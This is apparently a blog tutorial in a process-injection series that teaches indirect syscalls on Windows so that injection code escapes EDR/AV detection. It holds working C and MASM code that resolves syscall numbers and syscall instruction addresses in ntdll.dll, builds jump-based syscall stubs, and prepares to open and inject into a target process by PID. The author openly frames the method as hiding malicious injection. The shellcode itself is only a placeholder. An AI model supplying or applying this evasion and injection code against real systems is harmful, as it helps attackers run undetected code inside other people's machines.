
Indirect System Calls

September 12th, 2023


Prerequisites

This blog post (although considerably shorter than my previous posts) assumes extreme familiarity with WinAPI/NTAPI and you should've implemented a program that uses direct syscalls to perform shellcode/DLL injection by now. If you haven't, read the previous blog posts and get up to speed (don't worry, we'll wait for you to finish).

Direct System Calls

Overview

We've come a long way in our process injection journey, starting from the very basic WinAPI shellcode/DLL injections and going all the way to direct syscalls! Give yourselves a huge pat on the back for making it this far - you're also a certified nerd at this point. In this post, we'll go over what indirect syscalls are and why you'd want to use them over direct syscalls. A huge shoutout to VirtualAllocEx, aka Daniel Feichter from RedOps, and his blog post on direct/indirect syscalls.

The Problem With Direct Syscalls

By and large, the biggest issue with using direct syscalls to inject something malicious into a process, whether it's shellcode or a library, is that a program invoking a syscall from within its own code is highly unnatural and suspicious as hell. Think about it: why would a normal, unassuming program need to issue a syscall directly unless it was up to no good? Sure, you could point to a few cases in which it's actually done or sometimes needed, but those cases are few and far between. The point is that an EDR/AV, which is already on high alert, observing a program's execution go straight from its own code to a syscall instruction (which typically only lives in ntdll.dll) is very suspicious and sure to raise a couple of alarms. Using direct syscalls, our program flow looks something like the following:

System calls are typically executed in ntdll.dll. To have our program invoke a syscall without the syscall coming from ntdll.dll is very suspicious and places extra/unwanted scrutiny on our program. Indirect syscalls attempt to remedy this by jumping to a syscall instruction located inside of ntdll.dll.

As you can see from the picture above, this progression from our humble little program straight to a syscall, without ever passing through ntdll.dll, is a very strange path for our program to be taking indeed. If we look at the image below, we can see the path a program is typically expected to trek through before it ever invokes a syscall:

See? Never once does the program invoke a syscall directly. It jumps through several modules before landing inside of ntdll.dll, and only then is the syscall instruction executed. So, how might we go about making our program mimic this expected flow path?

Introducing Indirect Syscalls

To combat the issue that direct syscalls bring, we can make our program seem more "legitimate" and not have it stick out as much with the following: instead of executing a syscall instruction directly in our assembly function stubs, we replace the syscall instruction with a jump to the address of a legitimate syscall instruction elsewhere in ntdll.dll. Observe the following images to see what I mean by this:

This is what we've been doing up to this point. We move the syscall number into the eax register before invoking a syscall instruction. What we want to be doing with indirect syscalls is replacing the syscall instruction with something like the following:

You can see that when we reach the syscall instruction, where it once stood now stands a jmp qword ptr [NtOpenProcessSyscall]. So, when the execution gets to this point, it will jump to the address of a legitimate syscall instruction within ntdll.dll instead of us executing it directly. Hence, "indirect syscalls" since we're indirectly invoking a syscall instruction.

You don't have to set the addresses of the syscall instructions to be ones that are specifically meant for your function - for example, finding a syscall belonging to NtOpenProcess in your NtOpenProcess stub. The kernel picks which service to run from the SSN in eax, not from the address of the syscall instruction that was executed, so any syscall address, as long as it's valid and actually exists, will end up working.

Here's an example of indirect syscalls using the same syscall instruction address just as a proof-of-concept:

Debugger Insights

Just to drive the point home, let's set a breakpoint on the syscall instruction when we do a typical direct syscalls example, and then compare what happens to the execution flow when we do an indirect syscalls example. Don't worry about the code for now, we'll cover how to program this out in the implementations section of the blog. For now, just observe:

If we step a single instruction forward, we'll see that our program will invoke the syscall and then go to ret:

And, that's it! That's why we're calling it "direct syscalls": we invoke a syscall instruction directly, as seen above. Now, let's see what happens if we replace this syscall instruction with a jump to the address of a legitimate syscall somewhere in ntdll.dll. We'll immediately see a difference.

Now, if we step into this we'll see something incredible. Instead of invoking the syscall instruction directly, we jump to the location of the syscall instruction located in the NtOpenProcess stub in ntdll.dll:

It's important to note that just performing indirect syscalls might not be enough either. In terms of OPSEC, we haven't done anything to our programs to make them stealthier (this includes all the previous blog posts). We haven't incorporated API Hashing, custom GetProcAddress/GetModuleHandle, etc. So, with this being said, it's important to note that we're just covering the basic principles of these attacks - OPSEC implementations are left for you to go and try.

Implementation

Luckily, most of the code is freshly cooked copypasta (🍝) from our previous direct syscalls blog. The only thing we need to implement is a way to search for the address of the syscall instructions. If we recall from our dynamic SSN-seeking function:

DWORD GetSSN(
    IN HMODULE hNTDLL,
    IN LPCSTR NtFunction
) {

    DWORD NtFunctionSSN = 0;
    UINT_PTR NtFunctionAddress = 0;

    info("trying to get the address of %s...", NtFunction);
    NtFunctionAddress = (UINT_PTR)GetProcAddress(hNTDLL, NtFunction);

    if (NtFunctionAddress == 0) {
        warn("[GetProcAddress] failed to get the address of %s, error: 0x%lx", NtFunction, GetLastError());
        return 0;
    }

    okay("got the address of %s!", NtFunction);
    info("getting SSN of %s...", NtFunction);
    /* the byte at offset 0x4 is the low byte of the immediate in "mov eax, imm32" */
    NtFunctionSSN = ((PBYTE)(NtFunctionAddress + 4))[0];
    okay("\\___[\n\t| %s\n\t| 0x%p+0x4\n\t|____________________0x%lx]\n", NtFunction, (PVOID)NtFunctionAddress, NtFunctionSSN);
    return NtFunctionSSN;

}

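The way we were retrieving the SSN of a potential NTAPI function was by reading the byte at offset 0x4 in the assembly stub of said function. That byte is the low byte of the 32-bit immediate in the stub's mov eax instruction, so this shortcut only holds for SSNs below 0x100: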

NtFunctionSSN = ((PBYTE)(NtFunctionAddress + 4))[0];
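To make the offset 0x4 read a bit more concrete, here's a minimal sketch that works on hard-coded byte arrays instead of a live ntdll.dll. The array names, helper names, and SSN values (0x26 and 0x12A) are made up for illustration and aren't part of the original code. It compares the single-byte read used above with a read of the whole 32-bit immediate:

```c
#include <stdint.h>

/* Illustrative prologue bytes of an x64 syscall stub:
 *   4C 8B D1        mov r10, rcx
 *   B8 xx xx xx xx  mov eax, imm32   (imm32 starts at offset 0x4)
 * The SSN values below are assumptions chosen for the example. */
static const uint8_t small_ssn_stub[] = { 0x4C, 0x8B, 0xD1, 0xB8, 0x26, 0x00, 0x00, 0x00 };
static const uint8_t large_ssn_stub[] = { 0x4C, 0x8B, 0xD1, 0xB8, 0x2A, 0x01, 0x00, 0x00 };

/* Same idea as the post's read: only the byte at offset 0x4. */
static uint32_t ssn_low_byte(const uint8_t *stub) {
    return stub[4];
}

/* Reads all four bytes of the little-endian immediate at offset 0x4. */
static uint32_t ssn_full(const uint8_t *stub) {
    return (uint32_t)stub[4]
         | ((uint32_t)stub[5] << 8)
         | ((uint32_t)stub[6] << 16)
         | ((uint32_t)stub[7] << 24);
}
```

For the first array both helpers agree on 0x26. For the second, the single-byte read yields 0x2A while the full read yields 0x12A, which is why the shortcut is only safe for small SSNs.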

We can implement the same logic behind getting the syscall number to get the address of a syscall instruction. If we look at a typical syscall stub, we'll see that the syscall instruction sits at an offset of 0x12:
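As a rough reference, the layout of an unhooked stub on recent x64 Windows builds can be written out as a byte array. This is a sketch under assumptions: the SSN value (0x26), the array name, and the has_syscall_at helper are hypothetical, and the layout isn't guaranteed to be identical on every build. It only inspects a static buffer, not a loaded module:

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>

/* Assumed layout of a typical unhooked x64 stub (offsets on the left). */
static const uint8_t typical_stub[] = {
    0x4C, 0x8B, 0xD1,                               /* 0x00 mov r10, rcx                 */
    0xB8, 0x26, 0x00, 0x00, 0x00,                   /* 0x03 mov eax, 26h (example SSN)   */
    0xF6, 0x04, 0x25, 0x08, 0x03, 0xFE, 0x7F, 0x01, /* 0x08 test byte ptr [7FFE0308h], 1 */
    0x75, 0x03,                                     /* 0x10 jne to the int 2Eh path      */
    0x0F, 0x05,                                     /* 0x12 syscall                      */
    0xC3,                                           /* 0x14 ret                          */
    0xCD, 0x2E,                                     /* 0x15 int 2Eh                      */
    0xC3                                            /* 0x17 ret                          */
};

/* Returns true when the two bytes at `offset` are 0F 05 (syscall).
 * The bounds check keeps the read inside the buffer. */
static bool has_syscall_at(const uint8_t *stub, size_t len, size_t offset) {
    if (offset + 1 >= len) {
        return false;
    }
    return stub[offset] == 0x0F && stub[offset + 1] == 0x05;
}
```

Calling has_syscall_at(typical_stub, sizeof(typical_stub), 0x12) returns true, while any other offset in this buffer returns false. If the bytes at 0x12 don't match, the stub doesn't have the expected layout and the offset shouldn't be trusted.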

We can also see that a syscall instruction is encoded as the following two bytes: 0x0f, 0x05. Knowing this, we can read the bytes at the 0x12 offset and confirm that these two values are present, indicating that we've landed at a valid syscall instruction/address. The finished function looks like the following:

VOID IndirectPrelude(
    IN HMODULE hNTDLL,
    IN LPCSTR NtFunction,
    OUT DWORD* SSN,
    OUT UINT_PTR* Syscall
) {

    UINT_PTR NtFunctionAddress = 0;
    BYTE SyscallOpcode[2]      = {0x0F, 0x05};

    info("beginning indirect prelude...");
    info("trying to get the address of %s...", NtFunction);
    NtFunctionAddress = (UINT_PTR)GetProcAddress(hNTDLL, NtFunction);

    if (NtFunctionAddress == 0) {
        warn("[GetProcAddress] failed, error: 0x%lx", GetLastError());
        return; /* VOID function, so there is no value to return */
    }

    okay("got the address of %s! (0x%p)", NtFunction, (PVOID)NtFunctionAddress);
    *SSN = ((PBYTE)(NtFunctionAddress + 4))[0];
    *Syscall = NtFunctionAddress + 0x12;

    /* memcmp expects pointers, so cast the stored address back before comparing */
    if (memcmp(SyscallOpcode, (PVOID)*Syscall, sizeof(SyscallOpcode)) == 0) {
        okay("syscall signature (0x0F, 0x05) matched, found a valid syscall instruction!");
    }
    else {
        warn("expected syscall signature: 0x0f,0x05 didn't match.");
        return;
    }

    okay("got the SSN of %s (0x%lx)", NtFunction, *SSN);
    printf("\n\t| %s ", NtFunction);
    printf("\n\t|\n\t| ADDRESS\t| 0x%p\n\t| SYSCALL\t| 0x%p\n\t| SSN\t\t| 0x%lx\n\t|____________________________________\n\n", (PVOID)NtFunctionAddress, (PVOID)*Syscall, *SSN);

}

The code works beautifully but again, I'm sure this function can be made much better. You're urged to make this more efficient and fix my ape-brained hacky code. So, go ahead, break my heart :'(

With this function created, we can now use it to populate a new variable that we'll need in order to house the address(es) of the syscall instructions:

#include "glassBox.h"

DWORD NtCloseSSN;
DWORD NtOpenProcessSSN;
DWORD NtCreateThreadExSSN;
DWORD NtWriteVirtualMemorySSN;
DWORD NtWaitForSingleObjectSSN;
DWORD NtAllocateVirtualMemorySSN;

UINT_PTR NtCloseSyscall;
UINT_PTR NtOpenProcessSyscall;
UINT_PTR NtCreateThreadExSyscall;
UINT_PTR NtWriteVirtualMemorySyscall;
UINT_PTR NtWaitForSingleObjectSyscall;
UINT_PTR NtAllocateVirtualMemorySyscall;

[...]

Please note, as we've covered already, you can 100% use one (1) syscall instruction address for all of your syscall stubs, I'm just doing it like this for the sake of completeness.

Now, in our syscalls.asm file, we can add in the following:

.data

EXTERN NtOpenProcessSSN:DWORD          
EXTERN NtOpenProcessSyscall:QWORD

EXTERN NtAllocateVirtualMemorySSN:DWORD
EXTERN NtAllocateVirtualMemorySyscall:QWORD

EXTERN NtWriteVirtualMemorySSN:DWORD
EXTERN NtWriteVirtualMemorySyscall:QWORD  

EXTERN NtWaitForSingleObjectSSN:DWORD
EXTERN NtWaitForSingleObjectSyscall:QWORD  

EXTERN NtCreateThreadExSSN:DWORD       
EXTERN NtCreateThreadExSyscall:QWORD 

EXTERN NtCloseSSN:DWORD
EXTERN NtCloseSyscall:QWORD

.code

NtOpenProcess proc
		mov r10, rcx
		mov eax, NtOpenProcessSSN       
		jmp qword ptr [NtOpenProcessSyscall]
		ret                             
NtOpenProcess endp

[...]

After doing this, all we need to do is call our IndirectPrelude function to populate these variables and get them ready for use. Our function makes this super easy:

[...]

int main(int argc, char** argv) {

    DWORD    PID      = 0;
    HMODULE  hNTDLL   = NULL;
    NTSTATUS STATUS   = 0;
    PVOID    rBuffer  = NULL;
    HANDLE   hThread  = NULL;
    HANDLE   hProcess = NULL;

    const UCHAR crowPuke[] = { 0xDE, 0xAD, 0xBE, 0xEF };

    SIZE_T crowPukeSize = sizeof(crowPuke);
    SIZE_T bytesWritten = 0;

    if (argc < 2) {
        warn("usage: %s <PID>", argv[0]);
        return EXIT_FAILURE;
    }

    PID = atoi(argv[1]);
    CLIENT_ID CID = { (HANDLE)(ULONG_PTR)PID, 0 };
    OBJECT_ATTRIBUTES OA = { sizeof(OA), 0 };

    /* resolve the SSN and a syscall instruction address for every stub we use */
    hNTDLL = GetMod(L"NTDLL");
    IndirectPrelude(hNTDLL, "NtOpenProcess", &NtOpenProcessSSN, &NtOpenProcessSyscall);
    IndirectPrelude(hNTDLL, "NtAllocateVirtualMemory", &NtAllocateVirtualMemorySSN, &NtAllocateVirtualMemorySyscall);
    IndirectPrelude(hNTDLL, "NtWriteVirtualMemory", &NtWriteVirtualMemorySSN, &NtWriteVirtualMemorySyscall);
    IndirectPrelude(hNTDLL, "NtCreateThreadEx", &NtCreateThreadExSSN, &NtCreateThreadExSyscall);
    IndirectPrelude(hNTDLL, "NtWaitForSingleObject", &NtWaitForSingleObjectSSN, &NtWaitForSingleObjectSyscall);
    IndirectPrelude(hNTDLL, "NtClose", &NtCloseSSN, &NtCloseSyscall);

    okay("indirect prelude finished! beginning injection");
    info("getting a handle on the process (%lu)...", PID);

[...]

After all of this, we can finally compile this and run it!

And there we have it! Indirect syscalls demystified! What we've effectively done is the following:

You can find the code from this post in the GitHub repository or in the attached files below:

Anyway, that's all for now. See ya.
